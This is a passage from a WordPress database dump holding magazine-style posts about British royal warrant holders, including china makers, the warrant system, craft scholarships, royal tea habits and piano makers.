doesn’t.”</p>&#13;\n<p>Not only is this more cost-effective, it meets demand from the public for quality baths restored to their former glory, rather than cheap reproductions.</p>&#13;\n<p>“A royal warrant tends to be a guarantee of quality and people are excited to think there is a royal connection,” says Gallacher.</p>&#13;\n<div class=\"woo-sc-box normal   \">&#13;\n<h3>Top tips on how to get the country house look</h3>&#13;\n<ul><li>Mix old and new. Don’t be frightened to mix inherited furniture with contemporary pieces and have some fun – some say silvering is the new gilding.</li>&#13;\n<li>Look for modern heritage pieces that are quality buys today and are the heirlooms of the future.</li>&#13;\n<li>&#13;\n<div id=\"attachment_1178\" class=\"wp-caption alignright\" style=\"width: 368px\"><img class=\"size-full wp-image-1178 \" title=\"106540009\" src=\"http://westonspirit.org.uk/wp-content/uploads/2011/12/106540009.jpg\" alt=\"\" width=\"358\" height=\"238\" /><p class=\"wp-caption-text\">Who would live in a house like this ? Country style for any home</p></div>Leather occasional chairs and sofas are country house classics, but look for lighter shades such as bone. For fabric upholstery, royal warrant holder Robert Kime also has a range of traditionally made chairs in fresh colours.</li>&#13;\n<li>Display decorative pieces from today’s silversmiths and artisans as well as inherited traditional pieces – Halcyon Days and Thomas Goode, for example, offer classic and heritage designs.</li>&#13;\n<li>Wallpaper and fabric can offers a modern take on the country house look. Dorset, for example, a best selling heritage-style design from Cole &amp; Son, was brought back from the archives due to its popularity.</li>&#13;\n<li>Heritage paint shades stand the test of time, acting as backgrounds on which you can layer fabric, furniture and accessories to create a modern country house look. Warrant holder Papers and Paints says its best-sellers to the public are the traditional stone shades, although its expertise is in tailoring colours to historic homes.</li>&#13;\n<li>A few years ago, classic damasks were predominantly seen on heavy silks. The latest fabric collections showcase them on linens and cottons – not only are they more affordable but they’re more relaxed and suited to today’s love of living in light-filled rooms.</li></ul></div>&#13;\n&#13;\n<p> </p>&#13;\n									</div>','Pump up the pomp','917','publish','open','open','','pump-up-the-pomp','','','2018-04-02 20:08:50','2018-04-02 20:08:50','',0,'http://westonspirit.org.uk/pump-up-the-pomp.asp',0,'post','',0),(85,1,'2017-04-28 18:56:38','2017-04-28 18:56:38','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">4 December 2016</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Quality beyond compare\" st_url=\"http://westonspirit.org.uk/2011/12/quality-beyond-compare/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Quality beyond compare\" st_url=\"http://westonspirit.org.uk/2011/12/quality-beyond-compare/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Quality beyond compare\" st_url=\"http://westonspirit.org.uk/2011/12/quality-beyond-compare/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Quality beyond compare\" st_url=\"http://westonspirit.org.uk/2011/12/quality-beyond-compare/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Quality beyond compare\" st_url=\"http://westonspirit.org.uk/2011/12/quality-beyond-compare/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                		&#13;\n                	                	<h4>Whether it’s highly personalised bespoke pieces or tableware in a range of quality designs, one china company is a cut above the rest</h4>&#13;\n<p>Choosing bespoke china sets you apart – and puts you in exclusive company. So says Trevor Johnson, managing director of Caverswall China, which was awarded the royal warrant from the Prince of Wales in 2008.</p>&#13;\n<p>“We have made tableware for Highgrove House, often decorated with flowers or trees, in keeping with the prince’s love of nature,” he says.</p>&#13;\n<p>The company, based in Stoke-on-Trent, Staffordshire, has also supplied giftware for the prince and the Duchess of Cornwall, and supplied coffee cups and saucers presented as gifts to guests at events such as dinners mounted by the Royal Ballet, of which the prince is president.</p>&#13;\n<p>The prince’s royal warrant, as well as being a guarantee of fine quality, also means customers can be confident that they are buying from a “green” company. In fact, the Prince of Wales was the first of the royal warrant grantors to demand that warrant holders demonstrate a positive environmental programme for the future.</p>&#13;\n<p><img class=\"alignright size-full wp-image-1135\" title=\"picture 065\" src=\"http://westonspirit.org.uk/wp-content/uploads/2011/12/Edinburgh.jpg\" alt=\"\" width=\"300\" height=\"304\" />“We had to produce reports on our environmental policies, explaining how we recycle all our scrap clay back to the supplier, so it can be used again, and how all our metal and paper waste is recycled,” says Johnson.</p>&#13;\n<p>“As well as scrap paper that is taken away for recycling, we also recycle some waste paper by shredding it for packaging.” The company’s effluent and clay slurry is also collected and taken away by tanker for use in land reclamation.</p>&#13;\n<p>Others who appreciate Caverswall’s bespoke china include Sir Elton John, Tina Turner, Sir Paul McCartney and Sir Michael Caine.</p>&#13;\n<p>“Our team of designers and highly skilled painters can produce and decorate china to order,” says Johnson.</p>&#13;\n<p>“One customer had a Churchill room in his castle for which he wanted giftware, vases and wall plaques decorated with images of Winston Churchill, which he supplied. Another sent a picture of the family cat on the lawn which we had painted on to a large lidded vase.”</p>&#13;\n<p>Individually painted pieces, such as vases or plates featuring favourite pets, are often ordered as gifts for birthdays and anniversaries. “They require detailed work by skilled artists and multiple firings, and cost from about £500 to several thousand pounds,” says Johnson.</p>&#13;\n<p>The company also has experience of producing for Middle East collectors, who typically enjoy designs decorated with raised gold and platinum.</p>&#13;\n<p>As well as one-off pieces, Caverswall produces bespoke collections, such as tableware for homes, private aircraft or yachts, and promotional items, and offers monogramming and cresting services.</p>&#13;\n<p>The company is also well known for collectors’ plates, featuring subjects including birds and flowers, and anniversary plates. Its commemorative ware includes a collection of limited edition items celebrating the Queen’s Diamond Jubilee in 2017.</p>&#13;\n<p>Caverswall also supplies 13 patterns of tableware in traditional and modern designs, available through its website and luxury retailers such as Fortnum and Mason, Asprey and glass and china specialist Thomas Goode.</p>&#13;\n<p>“We are extremely proud of our royal warrant, which recognises our commitment to the quality and care which has been the hallmark of the potteries since the 18th century,” says Johnson.</p>&#13;\n<p><strong></strong></p><div class=\"woo-sc-box normal   \"><em><strong><a title=\"www.caverswallchina.co.uk\" href=\"http://www.caverswallchina.co.uk/\" target=\"_blank\">www.caverswallchina.co.uk</a></strong></em></div>&#13;\n									</div>','Quality beyond compare','531','publish','open','open','','quality-beyond-compare','','','2018-04-02 20:08:48','2018-04-02 20:08:48','',0,'http://westonspirit.org.uk/quality-beyond-compare.asp',0,'post','',0),(86,1,'2015-10-05 02:37:20','2015-10-05 02:37:20','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">4 December 2016</span>&#13;\n        <span class=\"sep\">•</span>&#13;\n    <span class=\"post-author\"><span class=\"small\"></span>&#13;\n        </span></p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Queen among accolades\" st_url=\"http://westonspirit.org.uk/2011/12/queen-among-accolades/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Queen among accolades\" st_url=\"http://westonspirit.org.uk/2011/12/queen-among-accolades/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Queen among accolades\" st_url=\"http://westonspirit.org.uk/2011/12/queen-among-accolades/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Queen among accolades\" st_url=\"http://westonspirit.org.uk/2011/12/queen-among-accolades/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Queen among accolades\" st_url=\"http://westonspirit.org.uk/2011/12/queen-among-accolades/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<h4>Exacting standards have to be met before a company can enjoy the prestige of displaying the royal coat of arms</h4>&#13;\n<p>I t is one of the most prestigious clubs in the world. Members range from chimney sweeps to silversmiths, from bagpipe makers to luxury car suppliers.</p>&#13;\n<p>The one thing they have in common is supplying goods and services “by appointment” <img class=\"alignright size-full wp-image-1147\" title=\"99963717\" src=\"http://westonspirit.org.uk/wp-content/uploads/2011/12/99963717.jpg\" alt=\"\" width=\"210\" height=\"315\" />to the royal family.</p>&#13;\n<p>The 800 royal warrant holders from trade and industry can display the relevant coat of arms on letterheads, in adverts, on vehicles and outside their premises.</p>&#13;\n<p>“It is highly prestigious, and companies granted warrants are hugely proud of the fact,” says Richard Peck, secretary of the Royal Warrant Holders Association, part trade organisation, part guardian of the system.</p>&#13;\n<p>Royal chimney sweep Kevin Giddings, whose company maintains around 1,000 chimneys at Buckingham Palace and other royal buildings, says that, when it comes to industry awards, nothing compares with a royal warrant. “It is the ultimate accolade and, because it is reviewed every few years, demonstrates holders have maintained the highest standards of service,” he says.</p>&#13;\n<p>Three members of the royal family grant warrants, or are “grantors”: the Queen, the Duke of Edinburgh and the Prince of Wales.</p>&#13;\n<p><img class=\"alignleft size-full wp-image-1150\" title=\"BOS Good Ordinary Claret Jan 08 HR 2\" src=\"http://westonspirit.org.uk/wp-content/uploads/2011/12/BOS-Good-Ordinary-Claret-Jan-08-HR-2.jpg\" alt=\"\" width=\"210\" height=\"398\" /></p>&#13;\n<p>The Queen decides who those grantors should be. “I am always being asked when the Duke of Cambridge will be able to grant warrants,” says Peck. “The answer is, I haven’t the faintest idea. It is entirely in the gift of the Queen.”</p>&#13;\n<p>Companies can apply for a warrant if they have supplied the royal household for five years. Applications are put forward by the association and approved by a committee chaired by the Lord Chamberlain, but need final approval from the relevant royal family member.</p>&#13;\n<p>“The recommendation goes to the grantor who will sign it off. It is a very personal issue,” says Peck.</p>&#13;\n<p>Coats of arms can be displayed by the warrant holders but references to royal connections must be discreet. “A company could not, for example, go on television or into print drawing attention to the warrant beyond carrying the coat of arms,” says Peck.</p>&#13;\n<p>Discussing in detail what the particular member of the royal family buys is also off limits, he adds. “There is a huge amount of interest around the royal household – much of it is quite personal to them, so it is not allowed.”</p>&#13;\n<p><img class=\"alignright size-full wp-image-1151\" title=\"Burberry\" src=\"http://westonspirit.org.uk/wp-content/uploads/2011/12/Burberry.jpg\" alt=\"\" width=\"213\" height=\"320\" />A look at warrant holders through the ages shows changing tastes, not just among the royals but among UK consumers generally. In 1900 there were suppliers of wax, dairy utensils, and lamp oil. By 1946 there were purveyors of Ryvita, Thermos flasks and Ovaltine. Today, suppliers of mobile phones, broadband and computer software sit alongside those of wines, gourmet meats and fine clothes.</p>&#13;\n<p>For 15 years Prince Charles’s warrant holders have had to explain how they reduce their carbon footprint, save energy, and recycle. The policy now extends to all new warrants and next year will be included in warrant holders’ five-yearly review.</p>&#13;\n<p>“It is more than just an environmental audit, it also extends to corporate social responsibility,” says Peck. “They are keen to find out, for example, where companies source products and materials. The royal household is concerned that companies that supply them are using labour which is properly rewarded and fair.</p>&#13;\n<p><img class=\"alignleft size-full wp-image-1148\" title=\"97748060\" src=\"http://westonspirit.org.uk/wp-content/uploads/2011/12/97748060.jpg\" alt=\"\" width=\"210\" height=\"382\" />“As far as environmental policy is concerned, they have to demonstrate they are fully considering the environmental implications of their business and their carbon footprint,” he adds.</p>&#13;\n<p>Around 30 firms are approved each year. Many, but not all, are based near royal palaces and homes – Buckingham Palace, Windsor, Balmoral, Sandringham, Highgrove, and Holyrood. Whatever the size of the company, the warrant goes to an individual – an owner or managing director – who has personal responsibility to ensure best quality service.</p>&#13;\n<p>Royal Warrant Association president Bob Hall, chairman of grain merchants James &amp; Son, says: “The warrant holders are an unbelievably diverse group of companies, from jewellers to the man who cuts the grass at Balmoral. The one thing we all have in common is quality of service.”</p>&#13;\n<p>And this level of service is recognised worldwide, adds Peck. “If you go to the Far East they have huge regard for [the royal warrant], particularly in China where they have had dynasties. They understand that the monarchy will only buy from the best.”</p>&#13;\n<p>Interestingly, the warrant has greater value in the export markets of the Far East and, to a certain extent the Middle East, than in the home market. It also has a bigger impact in the US, says Peck.</p>&#13;\n<p>“The Americans adore anything like that.”</p>&#13;\n									</div>','Queen among accolades','755','publish','open','open','','queen-among-accolades','','','2018-04-02 20:08:47','2018-04-02 20:08:47','',0,'http://westonspirit.org.uk/queen-among-accolades.asp',0,'post','',0),(87,1,'2014-07-29 08:01:08','2014-07-29 08:01:08','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">4 December 2016</span>&#13;\n        <span class=\"sep\">•</span>&#13;\n    <span class=\"post-author\"><span class=\"small\">By</span> wfinn\" title=\"Posts by Widget Finn\" rel=\"author\"&gt;Widget Finn</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Restore, renew, revive\" st_url=\"http://westonspirit.org.uk/2011/12/restore-renew-revive/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Restore, renew, revive\" st_url=\"http://westonspirit.org.uk/2011/12/restore-renew-revive/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Restore, renew, revive\" st_url=\"http://westonspirit.org.uk/2011/12/restore-renew-revive/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Restore, renew, revive\" st_url=\"http://westonspirit.org.uk/2011/12/restore-renew-revive/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Restore, renew, revive\" st_url=\"http://westonspirit.org.uk/2011/12/restore-renew-revive/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<h4>The charitable arm of the Royal Warrant Holders Association supports skilled craftspeople and their work in preserving our heritage</h4>&#13;\n<p>Craftsmanship is woefully undervalued in this country and in a recession training has a low priority in every field. However, over two decades the Queen Elizabeth Scholarship Trust (QEST), the charitable arm of the Royal Warrant Holders Association, has awarded scholarships to 242 craftspeople for study, training and work experience.</p>&#13;\n<p><img class=\"alignright size-full wp-image-1183\" title=\"Mel Howse at work on copyright\" src=\"http://westonspirit.org.uk/wp-content/uploads/2011/12/Mel-Howse-at-work-on-copyright.jpg\" alt=\"\" width=\"300\" height=\"400\" />“Our scholarships are incredibly important in restoring the status of craftsmanship and in supporting craftspeople who maintain and add to our heritage,” says QEST chairman, Richard Watling.</p>&#13;\n<p>QEST was established in 1990 to celebrate the 150th anniversary of the Royal Warrant Holders Association and the 90th birthday of the late Queen Elizabeth, the Queen Mother. It awards scholarships every year to craftspeople of all ages who are involved in crafts ranging from silversmithing to boatbuilding. Churches in particular are benefiting from a new generation of QEST scholars whose skills contribute to ecclesiastical decoration and conservation.</p>&#13;\n<p>The charity is launching the QEST 2017 Diamond Jubilee Appeal, aimed at doubling the number of annual scholarships. Distillers and royal warrant holder John Walker &amp; Sons has pledged profits from the sale of a rare edition whisky, blended from those distilled in 1952 in a limited edition of 60 crystal decanters.</p>&#13;\n<div class=\"woo-sc-box normal   \">&#13;\n<h4>A quest for craft</h4>&#13;\n<h3><strong>Work of heart</strong></h3>&#13;\n<p>Mel Howse, a glass artist, used the QEST scholarship to develop enamelling skills working on steel. “I had the ideas but lacked time and space to experiment in a new medium,” she says. “The scholarship gave me time to <img class=\"alignleft size-medium wp-image-1184\" title=\"B 46814\" src=\"/wp-content/uploads/2011/12/Mel-Howse-fireandwater-pic-credit-Aoibheann-www-evanne-co-uk-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" />think about what I was doing and enabled me to rent space in an enamelling factory.”</p>&#13;\n<p>One of her most recent works, Poverty Over, is a sculpture of two bowls in spun steel and vitreous enamels 2.2 metres high, commissioned by Christian Aid to publicise its Poverty Over campaign.</p>&#13;\n<p>Howse sees herself as a contemporary designer, yet enjoys working in a traditional environment. She works with challenging topics. Her acidetched memorial window to Father Trevor Huddleston in Lancing College Chapel, West Sussex, dedicated by his friend Archbishop Desmond Tutu in 2007, tackles the subject of apartheid. The scholarship enabled Howse to build relationships with other businesses that could help her create large-scale artwork. But its greatest value was to allow her to bring a new medium to the ecclesiastical arena. “It’s the first time that fired enamel on steel has been used in a church commission – I was making history.”</p>&#13;\n<h3><strong>Carving a niche</strong></h3>&#13;\n<p>After a publishing career with Oxford University Press, Bernard Johnson found his true vocation on a weekend course in stone carving. In 2005 he set up as a <img class=\"alignright size-medium wp-image-1181\" title=\"Johnson LetterCarving\" src=\"/wp-content/uploads/2011/12/Johnson-LetterCarving-300x199.jpg\" alt=\"\" width=\"300\" height=\"199\" />freelance stone carver and a year later, at the age of 52, won a QEST scholarship for individual teaching from the eminent lettering craftsman Ieuan Rees.</p>&#13;\n<p>When six rough drawings by Eric Gill for carved marble capitals in Westminster Cathedral were rediscovered, Johnson got permission from the cathedral to use them as the basis for a set of panel carvings. “It was a unique opportunity for me to get into the mind of a stone carver whom I admire enormously,” says Johnson.</p>&#13;\n<p>A donor has bought the panels which will be displayed in the University Church at Oxford.</p>&#13;\n<h3><strong>A brush with history</strong></h3>&#13;\n<p>Spike Barlow’s career changed direction thanks to a QEST scholarship. A trained scientist, then one of the creative team behind television’s Spitting Image puppets, Barlow used QEST funding to complete a PhD in paint conservation.</p>&#13;\n<p><img class=\"alignleft size-medium wp-image-1180\" title=\"Bernard Johnson Eric Gill 2\" src=\"http://westonspirit.org.uk/wp-content/uploads/2011/12/Bernard-Johnson-Eric-Gill-2-300x210.jpg\" alt=\"\" width=\"300\" height=\"210\" />“My first conservation commissions were restoring the two oldest altarpieces in the country, Thornham Parva[Suffolk] dated 1330 and Westminster Abbey, painted in 1260 – so no pressure. Working on them gave me a huge respect for the sophistication of medieval craftsmanship.”</p>&#13;\n<p>His resulting book, The Alchemy of Paint, looks at the philosophy of medieval craft and Barlow now has a grant to survey the 500 surviving rood screens in East Anglia.</p>&#13;\n<h3><strong>The write move</strong></h3>&#13;\n<p>Sally Mangum, calligrapher and heraldic artist, learnt about QEST scholarships when she became a royal warrant holder for her calligraphy work for the Lord Chamberlain’s office. It led her to study heraldic art. “The scholarship was a lifeline,” she says.</p>&#13;\n<p>Then, in a natural progression, she agreed to become a trustee of QEST. “Having benefited myself I saw how important scholarships could be to craftsmen desperate to expand their knowledge and expertise.”</p><div class=\"woo-sc-hr\"></div>&#13;\n<p><em>For details of <strong>QEST scholarships</strong> and the appeal, visit <strong><a title=\"www.qest.org.uk/appeal.html\" href=\"http://www.qest.org.uk/appeal.html\" target=\"_blank\">www.qest.org.uk/appeal.html</a></strong></em> </p></div>&#13;\n<p> </p>&#13;\n									</div>','Restore, renew, revive','727','publish','open','open','','restore-renew-revive','','','2018-04-02 20:08:45','2018-04-02 20:08:45','',0,'http://westonspirit.org.uk/restore-renew-revive.asp',0,'post','',0),(89,1,'2016-11-10 17:56:59','2016-11-10 17:56:59','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">4 December 2016</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Get Up And Go – Live like a royal\" st_url=\"http://westonspirit.org.uk/2011/12/royal-warrants/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Get Up And Go – Live like a royal\" st_url=\"http://westonspirit.org.uk/2011/12/royal-warrants/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Get Up And Go – Live like a royal\" st_url=\"http://westonspirit.org.uk/2011/12/royal-warrants/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Get Up And Go – Live like a royal\" st_url=\"http://westonspirit.org.uk/2011/12/royal-warrants/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Get Up And Go – Live like a royal\" st_url=\"http://westonspirit.org.uk/2011/12/royal-warrants/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<p>Get Up And Go investigates the Queen’s taste in food, fashion and festive fare. We interview the warrant holders who supply the royal household and suggest how you too can live the life of royalty. We also look at great work the Queen’s suppliers are doing in keeping traditional crafts alive and kicking.</p>&#13;\n<p>Distributed with <em>The Sunday Telegraph</em></p>&#13;\n<p><object style=\"width:610px;height:400px\"><param name=\"movie\" value=\"http://static.issuu.com/webembed/viewers/style1/v1/IssuuViewer.swf?mode=embed&amp;documentId=111205105438-a8aa8638ada84bee9c3f0282f9a97d53&amp;docName=royal_warrants__new&amp;username=Lyonsdown&amp;loadingInfoText=royal%20warrants%202&amp;backgroundColor=fff9b6&amp;layout=http%3A%2F%2Fskin.issuu.com%2Fv%2Fcolor%2Flayout.xml\" /><param name=\"allowfullscreen\" value=\"true\" /><param name=\"menu\" value=\"false\" /><embed src=\"/webembed/viewers/style1/v1/IssuuViewer.swf\" type=\"application/x-shockwave-flash\" style=\"width:610px;height:400px\" flashvars=\"mode=embed&amp;documentId=111205105438-a8aa8638ada84bee9c3f0282f9a97d53&amp;docName=royal_warrants__new&amp;username=Lyonsdown&amp;loadingInfoText=royal%20warrants%202&amp;backgroundColor=fff9b6&amp;layout=http%3A%2F%2Fskin.issuu.com%2Fv%2Fcolor%2Flayout.xml\" allowfullscreen=\"true\" menu=\"false\"></embed></object></p>&#13;\n									</div>','Royal Warrants','68','publish','open','open','','royal-warrants','','','2018-04-02 20:08:43','2018-04-02 20:08:43','',0,'http://westonspirit.org.uk/royal-warrants.asp',0,'post','',0),(90,1,'2017-09-29 00:14:05','2017-09-29 00:14:05','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\"> </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Seal of approval\" st_url=\"http://westonspirit.org.uk/2011/12/seal-of-approval/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Seal of approval\" st_url=\"http://westonspirit.org.uk/2011/12/seal-of-approval/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Seal of approval\" st_url=\"http://westonspirit.org.uk/2011/12/seal-of-approval/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Seal of approval\" st_url=\"http://westonspirit.org.uk/2011/12/seal-of-approval/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Seal of approval\" st_url=\"http://westonspirit.org.uk/2011/12/seal-of-approval/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<h4>On the global stage, the royal warrant is seen as a mark of innovation, the finest quality and service…and good for the environment</h4>&#13;\n<p>From electric road sweepers to luxury cars, the royal warrant is seen worldwide as recognising innovation, and British export sales often benefit as a result.</p>&#13;\n<p>For Peter Munnoch, technical sales director at Tennant UK (formerly known as Applied Sweepers), whose Green Machines sweep the Royal Mews at Buckingham Palace, the royal warrant effect is unquantifiable but undeniable.</p><div class=\"woo-sc-quote\"><p> Eighty per cent of our business is export and when I mention our royal warrant it registers as a plus – Peter Munnoch</p></div>&#13;\n<p><img class=\"alignright size-medium wp-image-1187\" title=\"p13 BentleyStateLimousine2\" src=\"http://westonspirit.org.uk/wp-content/uploads/2011/12/p13-BentleyStateLimousine2-300x194.jpg\" alt=\"\" width=\"300\" height=\"194\" />“How do you differentiate your product from competitors? Eighty per cent of our business is export, and when I mention our royal warrant it registers as a plus. You can make all sorts of claims about your product – ours is the world’s first lithium ion phosphate suction sweeper – but it has earned Tennant a royal warrant because it’s a good machine with excellent after-sales service.”</p>&#13;\n<p>At Bentley Motors, which sells to more than 50 countries, Richard Charlesworth claims that the biggest markets – US and China – quote the royal warrant as the reason they buy. “Chinese entrepreneurs regard it as the new must-have car,” says Charlesworth, who rejoices under the splendid job title of director of royal and VIP relations.</p>&#13;\n<p><img class=\"alignleft size-medium wp-image-1186\" title=\"p13BentleyStateLimousine_\" src=\"http://westonspirit.org.uk/wp-content/uploads/2011/12/p13BentleyStateLimousine_-300x195.jpg\" alt=\"\" width=\"300\" height=\"195\" />Bentley flies the British flag for luxury and performance, in one year delivering both a state limousine and a Le Mans winner. The company has a strong tradition of apprenticeships and hand craftsmanship in wood veneering and hand-stitched leather with several generations of families working together.</p>&#13;\n<p>Grundon Waste is a family firm, founded in 1929 by Stephen Grundon, the father in- law of Frances Grundon, the current warrant- holder. The company pioneers environmentally acceptable waste collection and new technologies to create energy from waste, but Frances Grundon is particularly proud of achieving a royal warrant. “In most people’s mind it is a subliminal seal of approval,” she says.</p>&#13;\n<p> </p>&#13;\n									</div>','Seal of approval','332','publish','open','open','','seal-of-approval','','','2018-04-02 20:08:42','2018-04-02 20:08:42','',0,'http://westonspirit.org.uk/seal-of-approval.asp',0,'post','',0),(91,1,'2015-07-31 12:46:44','2015-07-31 12:46:44','<div class=\"entry\">&#13;\n                  <div class=\"sharethis_top_bar\">&#13;\n  <span class=\"st_email_hcount\" st_title=\"Tea for One\" st_url=\"http://westonspirit.org.uk/2011/12/tea-for-one/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Tea for One\" st_url=\"http://westonspirit.org.uk/2011/12/tea-for-one/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Tea for One\" st_url=\"http://westonspirit.org.uk/2011/12/tea-for-one/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Tea for One\" st_url=\"http://westonspirit.org.uk/2011/12/tea-for-one/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Tea for One\" st_url=\"http://westonspirit.org.uk/2011/12/tea-for-one/\" displaytext=\"plusone\"></span></div>&#13;\n                	                	                	<h4>What would you eat if you could have anything you wanted, whenever you wanted it? The Queen prefers it plain and simple</h4>&#13;\n<p>The Queen doesn’t seem particularly bothered about food. She oversees the menus at the Palace every week but she tends to be just as interested in what the dogs are going to eat. Her corgis always join her for afternoon tea at which they are treated to freshly-baked scones which their adoring mistress crumbles up for them. Her chefs also prepare dainty sandwiches and cakes and, of course, the Queen’s special blend of tea.</p>&#13;\n<p><img class=\"alignright size-full wp-image-1174\" title=\"jennie bond1\" src=\"http://westonspirit.org.uk/wp-content/uploads/2011/12/jennie-bond1.jpg\" alt=\"\" width=\"300\" height=\"452\" />The precise blend is a closely-guarded secret. Royal warrant holders Twinings are well aware that if you supply the royal household, the first rule is confidentiality. But from my experience of drinking tea at the Palace, I’d say there’s a generous helping of Earl Grey mixed, perhaps with the smoky flavour of Lapsang Souchong. In any case, it is a unique and delicate blend.</p>&#13;\n<p>If you’ve been fortunate enough to be invited to one of the Queen’s summer garden parties, you’ll have an idea of how precise and perfect royal cuisine tends to be. The crustless sandwiches are cut to a uniform shape and size, the patisserie is a work of art and it’s all very tasty.</p>&#13;\n<p>But if you’re looking for the wow factor, you need to get yourself invited to a meal with the Prince of Wales. With him, it’s all about the very finest organic and seasonal ingredients; fabulous cuts of Welsh lamb or local beef with freshly-picked vegetables from his extensive kitchen garden at Highgrove or, perhaps, the wild mushrooms he likes to forage at Balmoral.</p>&#13;\n<p>I once had a long conversation with the Prince about custard marrows while having tea in his drawing room at Highgrove. I remember sitting in a deep settee with very high arms and being rather embarrassed about how to extricate a cup from a highlipped tray offered by the butler. It all seemed very awkward – but the tea was good and so were the Duchy of Cornwall biscuits.</p>&#13;\n<p>Our meeting was taking place in the midst of the breakdown of his marriage to Diana – so gardening seemed a safe topic and the Prince seemed genuinely interested to hear about the bright yellow, organic custard marrows my husband and I had grown. And if you’re lucky enough to be asked to stay for canapés and champagne, do not demur. The nibbles at the Palace are good – but Prince Charles goes one step better and favours Anton Mosimann’s exotic creations which, in my experience, simply cannot be bettered.</p>&#13;\n<p><em><div class=\"woo-sc-box normal   \"> <strong>Jennie Bond</strong> is a former BBC royal correspondent</div></em></p>&#13;\n									</div>','Tea for One','444','publish','open','open','','tea-for-one','','','2018-04-02 20:08:40','2018-04-02 20:08:40','',0,'http://westonspirit.org.uk/tea-for-one.asp',0,'post','',0),(92,1,'2014-12-06 04:49:35','2014-12-06 04:49:35','<div class=\"entry\">&#13;\n                  <div class=\"sharethis_top_bar\">&#13;\n<span class=\"st_email_hcount\" st_title=\"The key to success\" st_url=\"http://westonspirit.org.uk/2011/12/the-key-to-success/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"The key to success\" st_url=\"http://westonspirit.org.uk/2011/12/the-key-to-success/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"The key to success\" st_url=\"http://westonspirit.org.uk/2011/12/the-key-to-success/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"The key to success\" st_url=\"http://westonspirit.org.uk/2011/12/the-key-to-success/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"The key to success\" st_url=\"http://westonspirit.org.uk/2011/12/the-key-to-success/\" displaytext=\"plusone\"></span></div>&#13;\n                	                	                		&#13;\n                	                	<h4>From Beethoven’s home to Buckingham Palace, the UK’s only piano making company has been known for its handmade quality since 1728</h4>&#13;\n<p>All royal warrant holders have a story to tell, but few compare with that of John Broadwood &amp; Sons.</p>&#13;\n<p>The firm has been supplying harpsichords and pianos to the royal family since Burkat Shudi, who founded the company in 1728, provided a harpsichord to Frederick, Prince of Wales in 1740. The royal warrant is thought to date back to at least George II. “Instruments that still exist have ‘By Appointment to His Majesty and the Princesses’ handwritten on their name boards,” said Dr Alastair Laurence.</p>&#13;\n<p><img class=\"alignleft size-full wp-image-1191\" title=\"Broadwood1846\" src=\"http://westonspirit.org.uk/wp-content/uploads/2011/12/Broadwood1846.jpg\" alt=\"\" width=\"300\" height=\"372\" />Broadwood – the UK’s only piano maker – remains a family company run by Dr Laurence and his cousin, Guy. 